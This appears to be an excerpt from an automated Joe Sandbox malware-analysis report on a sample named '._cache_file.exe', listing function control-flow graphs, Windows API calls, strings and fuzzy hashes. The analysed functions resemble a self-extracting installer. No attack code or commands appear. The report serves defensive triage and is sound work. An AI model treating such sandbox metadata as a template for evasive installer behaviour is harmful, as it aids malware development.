                                                                                              Function 010045EB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 72libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 744 10045eb-1004608 745 100460b-1004610 744->745 745->745 746 1004612-1004638 745->746 747 1004641-1004655 call 1004590 746->747 748 100463a-100463d 746->748 751 10046a6 747->751 752 1004657-1004667 GetFileAttributesA 747->752 748->747 754 10046a8-10046b1 call 10062ff 751->754 752->751 753 1004669-100466b 752->753 753->751 755 100466d-100467a LoadLibraryA 753->755 757 10046a1-10046a4 755->757 758 100467c-100468a GetProcAddress 755->758 757->754 758->757 760 100468c-1004699 DecryptFileA 758->760 760->757 761 100469b GetLastError 760->761 761->757
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?), ref: 0100465E
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 01004672
                                                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01004682
                                                                                              • DecryptFileA.ADVAPI32(?,00000000), ref: 01004695
                                                                                              • GetLastError.KERNEL32 ref: 0100469B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AddressAttributesDecryptErrorLastLibraryLoadProc
                                                                                              • String ID: DecryptFileA$advapi32.dll
                                                                                              • API String ID: 82924815-2381948369
                                                                                              • Opcode ID: 2afcba44abed0f4631d6c18061f481163f3b24b8efbb4aba021dffaed5c2241f
                                                                                              • Instruction ID: dd98f6a6a96e0f5451efa8104c5849e027a4f17fe98ce00ff4f40b46ec6d0873
                                                                                              • Opcode Fuzzy Hash: 2afcba44abed0f4631d6c18061f481163f3b24b8efbb4aba021dffaed5c2241f
                                                                                              • Instruction Fuzzy Hash: 4521D131604605DEFB62DB68CC4CBDA7BE9AB59300F0401A4EAC5E71C1EB75DA54CB16
                                                                                              Function 01002B13 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 762 1002b13-1002b4d GetDriveTypeA 763 1002b60-1002b80 CreateFileA 762->763 764 1002b4f-1002b50 762->764 765 1002b82-1002b9d DeviceIoControl 763->765 766 1002b57-1002b59 763->766 767 1002b52-1002b55 764->767 768 1002bae-1002bbc call 10062ff 764->768 770 1002ba5 765->770 771 1002b9f-1002ba3 765->771 766->768 767->766 769 1002b5b-1002b5e 767->769 769->768 773 1002ba7-1002ba8 CloseHandle 770->773 771->770 771->773 773->768
                                                                                              APIs
                                                                                              • GetDriveTypeA.KERNELBASE(?), ref: 01002B43
                                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 01002B75
                                                                                              • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 01002B95
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01002BA8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceDriveFileHandleType
                                                                                              • String ID: ?:\$\\.\?:
                                                                                              • API String ID: 3103408351-3307214488
                                                                                              • Opcode ID: 2c8683e07499ac882b6ccafdf590b753cf23b2020a389af79e37c9552ac3cdc0
                                                                                              • Instruction ID: 96b825b74241d8912b1bf084e53a85c8b322490675edc855e8f29042fc933e05
                                                                                              • Opcode Fuzzy Hash: 2c8683e07499ac882b6ccafdf590b753cf23b2020a389af79e37c9552ac3cdc0
                                                                                              • Instruction Fuzzy Hash: DE119332901618BAE722DBA99C4CEEFBFADEB49360F144161F695F3180DA748645C7B0
                                                                                              Function 01003016 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 274memoryfileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 474 1003016-100304f CreateFileA 475 1003055-1003077 ReadFile 474->475 476 10033c9-10033d3 call 10062ff 474->476 477 10033bb-10033c8 CloseHandle 475->477 478 100307d-1003083 475->478 477->476 478->477 480 1003089-1003092 478->480 482 10030e0-10030ea 480->482 483 1003094-10030ae SetFilePointer 480->483 482->477 484 10030f0-10030f9 482->484 483->477 485 10030b4-10030ce ReadFile 483->485 484->477 487 10030ff-1003102 484->487 485->477 486 10030d4-10030da 485->486 486->477 486->482 487->477 488 1003108-100310b 487->488 488->477 489 1003111-1003118 488->489 489->477 490 100311e-1003139 RtlAllocateHeap 489->490 490->477 491 100313f-1003153 SetFilePointer 490->491 491->477 492 1003159-100316f ReadFile 491->492 492->477 493 1003175-100317e 492->493 493->477 494 1003184-100318f 493->494 495 10031dd-10031e3 494->495 496 1003191-1003194 495->496 497 10031e5 495->497 498 1003196-10031a4 496->498 499 10031cf-10031d6 496->499 497->477 498->499 500 10031a6-10031b2 498->500 499->495 500->499 501 10031b4-10031ba 500->501 501->499 502 10031bc-10031c7 call 1002fe1 501->502 505 10031c9 502->505 506 10031ea-10031f3 502->506 505->499 507 1003221-100323b 506->507 508 10031f5-10031fd 506->508 507->477 510 1003241-1003247 507->510 509 100320b-1003211 508->509 511 1003213-100321f 509->511 512 10031ff-100320a 509->512 513 1003255-1003262 510->513 511->507 512->509 513->477 514 1003268-100326d 513->514 514->477 515 1003273-1003277 514->515 515->477 516 100327d-100329c 515->516 516->477 517 10032a2-10032ff WideCharToMultiByte 516->517 518 1003305-100330b 517->518 519 10033af-10033b5 517->519 518->519 520 1003311-1003328 HeapAlloc 518->520 519->477 521 1003249-100324f 519->521 520->477 522 100332e-100334e WideCharToMultiByte GetEnvironmentVariableA 520->522 521->513 522->519 523 1003350-100336e WideCharToMultiByte 522->523 523->519 524 1003370-1003376 523->524 524->519 525 1003378-100338b HeapAlloc 524->525 525->477 526 100338d-10033a9 WideCharToMultiByte SetEnvironmentVariableA 525->526 526->519
                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,10000000,00000000), ref: 01003040
                                                                                              • ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 01003073
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 010030A2
                                                                                              • ReadFile.KERNELBASE(?,00005A4D,000000F8,?,00000000), ref: 010030CA
                                                                                              • RtlAllocateHeap.NTDLL(00000008,00040000), ref: 01003129
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 0100314A
                                                                                              • ReadFile.KERNEL32(?,00000000,00040000,?,00000000), ref: 0100316B
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010032F5
                                                                                              • HeapAlloc.KERNEL32(00000008,00000000), ref: 0100331A
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0100333C
                                                                                              • GetEnvironmentVariableA.KERNEL32(?,00000000,00000000), ref: 01003346
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01003364
                                                                                              • HeapAlloc.KERNEL32(00000008,00000000), ref: 01003381
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 010033A0
                                                                                              • SetEnvironmentVariableA.KERNEL32(?,00000000), ref: 010033A9
                                                                                              • CloseHandle.KERNELBASE(?), ref: 010033C1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharMultiWide$HeapRead$AllocEnvironmentPointerVariable$AllocateCloseCreateHandle
                                                                                              • String ID: PE
                                                                                              • API String ID: 1909040894-4258593460
                                                                                              • Opcode ID: 7a117e422b0a1a894acefd9d8880e513f77c58c962ccde61173d9d4eb82a6e9e
                                                                                              • Instruction ID: bf8ad80c2da08c31ae0c339a365434081412969bf7389dda4636a4a9dec36aeb
                                                                                              • Opcode Fuzzy Hash: 7a117e422b0a1a894acefd9d8880e513f77c58c962ccde61173d9d4eb82a6e9e
                                                                                              • Instruction Fuzzy Hash: 55A15E71804128AFEB778B58CC85BE9FBB9FB14350F1481E9E689A6290DB714DC5CF60
                                                                                              Function 0100400D Relevance: 28.4, APIs: 8, Strings: 8, Instructions: 381COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 527 100400d-100402d GetModuleFileNameA 528 1004030-1004035 527->528 528->528 529 1004037-100403f 528->529 530 100404b-100404d 529->530 531 1004041-1004047 530->531 532 100404f-100406b call 1003e3a call 1003016 GetCommandLineA 530->532 531->532 533 1004049 531->533 538 100406d-1004071 532->538 533->530 539 1004073-1004075 538->539 540 100407b-100407d 538->540 539->540 541 1004077-1004079 539->541 542 1004082-1004083 540->542 543 100407f-1004081 540->543 541->540 544 1004085-100408a 541->544 542->538 543->542 545 10040a3-10040a5 544->545 546 100408c-1004091 544->546 548 10040a8-10040ad 545->548 546->545 547 1004093-1004096 546->547 549 10040a0 547->549 550 1004098-100409c 547->550 548->548 551 10040af-10040b5 548->551 549->545 550->547 553 100409e 550->553 552 10040c7-10040c9 551->552 554 10040b7-10040bc 552->554 555 10040cb-10040dd 552->555 553->545 556 10040c3-10040c6 554->556 557 10040be-10040c1 554->557 558 10040e0-10040e5 555->558 556->552 557->555 557->556 558->558 559 10040e7-10040ed 558->559 560 10040f5-10040f7 559->560 561 10040f9 560->561 562 10040ef-10040f2 560->562 565 100412c-100413c 561->565 563 10040f4 562->563 564 10040fb-10040fd 562->564 563->560 566 1004100-1004105 564->566 567 1004252-100425a 565->567 568 1004142-1004151 565->568 566->566 572 1004107-1004127 566->572 571 100425d-1004262 567->571 569 1004232-100423b 568->569 570 1004157-100415e 568->570 569->568 574 1004241 569->574 573 1004167-1004173 570->573 571->571 575 1004264-1004269 571->575 572->565 576 1004160-1004163 573->576 577 1004175-1004178 573->577 574->567 578 1004475-1004479 575->578 579 100426f-1004275 575->579 580 1004165-1004166 576->580 581 100417e-1004186 576->581 577->569 577->581 579->578 582 100427b-100427e 579->582 580->573 583 10041c3-10041c8 581->583 584 1004188-100418b 581->584 585 1004284-100428c 582->585 586 1004467-100446f 582->586 588 10041d3-10041fc 583->588 589 10041ca-10041cd 583->589 584->583 587 100418d-1004197 584->587 590 1004296-1004298 585->590 591 100428e-1004290 585->591 586->578 586->582 592 100419e-10041b4 587->592 595 100421e-100422b GetFileAttributesA 588->595 596 10041fe-1004216 588->596 589->588 593 10041cf-10041d1 589->593 594 100429b-10042a0 590->594 591->586 591->590 599 1004243-1004247 592->599 600 10041ba-10041be 592->600 593->569 593->588 594->594 601 10042a2-10042a7 594->601 597 100424c 595->597 598 100422d 595->598 596->595 597->567 598->569 599->583 600->592 603 10041c0 600->603 601->586 602 10042ad-10042b6 601->602 604 1004388-100438b 602->604 605 10042bc 602->605 603->583 608 10042c6 604->608 606 1004333-1004346 _strnicmp 605->606 607 10042be-10042c1 605->607 609 1004348 606->609 610 100436a-100437d _strnicmp 606->610 607->606 611 10042c3 607->611 612 1004448-1004459 _strnicmp 608->612 613 10042cc-10042cf 608->613 615 100434b-100435d call 1002f3a 609->615 610->586 618 1004383-1004386 610->618 611->608 614 100445b 612->614 616 10042d5-10042d6 613->616 617 100441c-100442f _strnicmp 613->617 614->586 619 100445d 614->619 615->586 634 1004363-1004365 call 1003892 615->634 621 10043e8-10043fb _strnicmp 616->621 622 10042dc-10042de 616->622 617->586 624 1004431 617->624 623 1004318-100431a 618->623 619->586 628 1004417-100441a 621->628 629 10043fd 621->629 630 10042e4-10042e6 622->630 631 10043d9-10043de 622->631 625 1004324-100432e 623->625 626 100431c-100431e 623->626 632 1004434-1004436 624->632 625->586 626->586 626->625 635 1004400-1004402 628->635 629->635 636 10043d4-10043d7 630->636 637 10042ec-10042ef 630->637 631->619 633 10043e0-10043e2 631->633 638 1004438-100443a 632->638 639 100443c-1004446 632->639 633->619 640 10043e4-10043e6 633->640 634->610 642 1004404-1004406 635->642 643 1004408-1004415 635->643 636->632 637->586 644 10042f5-10042fa 637->644 638->586 638->639 639->586 640->614 642->586 642->643 643->586 644->615 645 10042fc-10042fe 644->645 646 10043b4-10043b8 645->646 647 1004304-1004306 645->647 648 10043c2-10043cf 646->648 649 10043ba-10043bc 646->649 650 1004390-1004394 647->650 651 100430c-100430e 647->651 648->586 649->586 649->648 652 1004396-1004398 650->652 653 100439e-10043af 650->653 651->646 654 1004314-1004316 651->654 652->586 652->653 653->586 654->623 654->650
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\._cache_file.exe,00000104), ref: 01004025
                                                                                              • GetCommandLineA.KERNEL32 ref: 01004060
                                                                                              • GetFileAttributesA.KERNELBASE(To Directory:), ref: 01004223
                                                                                              • _strnicmp.MSVCRT ref: 0100433B
                                                                                              • _strnicmp.MSVCRT ref: 01004372
                                                                                              • _strnicmp.MSVCRT ref: 01004450
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strnicmp$File$AttributesCommandLineModuleName
                                                                                              • String ID: C:\Users\user\Desktop\._cache_file.exe$Extracting File:$To Directory:$extract$extract:$integrate$passive$quiet
                                                                                              • API String ID: 3875041768-1987711336
                                                                                              • Opcode ID: ac494798e5bc9b3b8e97eb29fcbcefb1249f91a18fa69446e7f113a224a58319
                                                                                              • Instruction ID: ee85d7d4dc22db283b7cf7d6e356c1cdb43bb5f1116dac34ca54e1d5d0c69bec
                                                                                              • Opcode Fuzzy Hash: ac494798e5bc9b3b8e97eb29fcbcefb1249f91a18fa69446e7f113a224a58319
                                                                                              • Instruction Fuzzy Hash: C2D1F130A042859EFB678B6C98583FA7FE1AB42308F4A41D4DBC1DB2CACB754546C75A
                                                                                              Function 010028D9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 678 10028d9-100291c SetErrorMode * 2 GetTickCount 679 100291e-1002952 sprintf CreateDirectoryA 678->679 680 1002954-100295f GetLastError 679->680 681 1002975-1002984 RemoveDirectoryA 679->681 682 10029a0-10029ba SetErrorMode call 10062ff 680->682 683 1002961-1002971 680->683 684 1002996 681->684 685 1002986-1002990 MoveFileExA 681->685 683->679 686 1002973 683->686 684->682 685->684 686->682
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00000000), ref: 01002901
                                                                                              • SetErrorMode.KERNELBASE(00000000), ref: 0100290D
                                                                                              • GetTickCount.KERNEL32 ref: 0100290F
                                                                                              • sprintf.MSVCRT ref: 01002937
                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000), ref: 0100294A
                                                                                              • GetLastError.KERNEL32 ref: 01002954
                                                                                              • RemoveDirectoryA.KERNELBASE(?), ref: 0100297C
                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 01002990
                                                                                              • SetErrorMode.KERNELBASE(?), ref: 010029A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$Directory$CountCreateFileLastMoveRemoveTicksprintf
                                                                                              • String ID: %s_%06u_
                                                                                              • API String ID: 2138407651-2224866286
                                                                                              • Opcode ID: 605b290757ffbc819f70990fed8fb14aff114087cd0563a7a2d4703900c9114f
                                                                                              • Instruction ID: 2b5bf619bf93649879f906ab2fef4dd1de3e953bea1c10fa8e68832a185b186a
                                                                                              • Opcode Fuzzy Hash: 605b290757ffbc819f70990fed8fb14aff114087cd0563a7a2d4703900c9114f
                                                                                              • Instruction Fuzzy Hash: AC2162719002189BEB22DB64CC4DBDA77BEEB54341F0040A6E685E2181D7B99A84CFA1
                                                                                              Function 010037BF Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 64fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 689 10037bf-10037d7 GetEnvironmentVariableA 690 100388a-100388c 689->690 691 10037dd-1003815 call 1002bc4 CreateFileA 689->691 694 1003817-1003861 WriteFile 691->694 695 1003889 691->695 696 1003863-1003866 694->696 697 1003876-1003882 CloseHandle 694->697 695->690 696->697 698 1003868-1003874 SetEnvironmentVariableA 696->698 697->695 698->695
                                                                                              APIs
                                                                                              • GetEnvironmentVariableA.KERNEL32(_SFX_CAB_SHUTDOWN_REQUEST,00000000,00000000), ref: 010037CF
                                                                                              • CreateFileA.KERNELBASE(c:\36a8a8e2fed651ec27d1eed188bb35\$shtdwn$.req,C0000000,00000003,00000000,00000001,04000002,00000000), ref: 01003804
                                                                                              • WriteFile.KERNELBASE(00000000,Sdwn,00000314,?,00000000), ref: 01003858
                                                                                              • SetEnvironmentVariableA.KERNEL32(_SFX_CAB_SHUTDOWN_REQUEST,c:\36a8a8e2fed651ec27d1eed188bb35\$shtdwn$.req), ref: 0100386E
                                                                                              • CloseHandle.KERNEL32 ref: 0100387C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileVariable$CloseCreateHandleWrite
                                                                                              • String ID: $shtdwn$.req$Sdwn$_SFX_CAB_SHUTDOWN_REQUEST$c:\36a8a8e2fed651ec27d1eed188bb35$c:\36a8a8e2fed651ec27d1eed188bb35\$shtdwn$.req
                                                                                              • API String ID: 510931695-3818779472
                                                                                              • Opcode ID: 74f9ad3b8f2023380f4faa6e9c0d97565d17dc7302695f93730564ca81c6b899
                                                                                              • Instruction ID: b0220b2b77477a676319b82448efaae5af67ee2cc9e6961861700f30aa540367
                                                                                              • Opcode Fuzzy Hash: 74f9ad3b8f2023380f4faa6e9c0d97565d17dc7302695f93730564ca81c6b899
                                                                                              • Instruction Fuzzy Hash: C8116D71604340ABF7338B9AAD4DF473AA9F786764F1043A9F1C1A61C8D7765641C770
                                                                                              Function 010063FF Relevance: 13.6, APIs: 9, Instructions: 87COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 718 10063ff-1006414 call 10065b8 721 1006416-1006425 718->721 722 100643e-1006442 718->722 721->722 723 1006427-1006434 721->723 724 100646e-10064bd __set_app_type __p__fmode __p__commode call 1003783 722->724 726 1006436-100643c 723->726 727 1006457-100645e 723->727 731 10064cb-1006529 call 10065a1 _initterm __getmainargs _initterm call 1005e92 724->731 732 10064bf-10064ca __setusermatherr 724->732 726->722 729 1006444-100644b 726->729 727->722 730 1006460-1006462 727->730 729->722 733 100644d-1006455 729->733 734 1006468-100646b 730->734 738 100652e-100653a 731->738 732->731 733->734 734->724 739 1006543-1006583 _cexit call 10065f3 738->739 740 100653c-100653d exit 738->740 740->739
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 1729372338-0
                                                                                              • Opcode ID: 6af886278659cd1f87929ba10df1e95ca34e58862df1f3af71c4c3f27de72d1c
                                                                                              • Instruction ID: 599c4623493fcb82760b158fed09b41a5123095cb67496b16860643f61b92bca
                                                                                              • Opcode Fuzzy Hash: 6af886278659cd1f87929ba10df1e95ca34e58862df1f3af71c4c3f27de72d1c
                                                                                              • Instruction Fuzzy Hash: 3B315874940205DFEB27DFA4D44CAEC77B2FB18312F10816AF196A62D8DB3B4A54CB21
                                                                                              Function 01003C0F Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 775 1003c0f-1003c35 CreateFileA 776 1003c37-1003c38 call 1003892 775->776 777 1003c3d-1003c52 SetFilePointer 775->777 776->777
                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,08000000,00000000), ref: 01003C2A
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000), ref: 01003C48
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateCriticalDeleteErrorExitLastLoadMessagePointerProcessSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 1911058658-0
                                                                                              • Opcode ID: 3db09fa30688c6ade57452f90a721c5f0e3047f88a1d14363bbe33cf621a1cff
                                                                                              • Instruction ID: f747d1a96e7ed0c96837ae8def0cda9aa80c9c8a6c6ac268114b6baa7651c347
                                                                                              • Opcode Fuzzy Hash: 3db09fa30688c6ade57452f90a721c5f0e3047f88a1d14363bbe33cf621a1cff
                                                                                              • Instruction Fuzzy Hash: 8EE086313803247BF5332669AC0EF8579099701B71F204251FB58BA1C0C6A56A40C798
                                                                                              Function 01003C87 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 779 1003c87-1003c93 780 1003c95-1003c9d 779->780 781 1003cdc-1003cf3 WriteFile 779->781 782 1003ca2-1003cd6 780->782 783 1003c9f 780->783 784 1003cf5-1003cfc call 1003892 781->784 785 1003cd7-1003cdb 781->785 782->785 783->782
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(DADAFEED,?,?,?,00000000), ref: 01003CEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 64d857ce796dace06822de0efcd78285d4c1ff5c9f778fdfecebaa5c7ebed988
                                                                                              • Instruction ID: 8ed4801c38d92fe31a950a2119f22d7affeb1643a363de039ab70ebeba9e11e9
                                                                                              • Opcode Fuzzy Hash: 64d857ce796dace06822de0efcd78285d4c1ff5c9f778fdfecebaa5c7ebed988
                                                                                              • Instruction Fuzzy Hash: 60012C3120024DAFDB12CFADD800AEA77E9FB58320F448969FA68C7190D779D951CB50
                                                                                              Function 01004590 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 788 1004590-10045aa 789 10045ac-10045af 788->789 790 10045dd-10045e3 788->790 791 10045b1-10045c0 CreateDirectoryA 789->791 792 10045d7-10045db 789->792 793 10045c2-10045cd call 100447f 791->793 794 10045d4 791->794 792->789 792->790 793->794 794->792
                                                                                              APIs
                                                                                              • CreateDirectoryA.KERNELBASE(?,?), ref: 010045B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 4241100979-0
                                                                                              • Opcode ID: a9c93d86d7b1e126657db29aee2ea8a09b01b806f2212d3dabd863b7a028eda3
                                                                                              • Instruction ID: 9cc6a4ee66b41767d7bcf1e787c71929ede8fd294d86324cd45e64105ddf3fa1
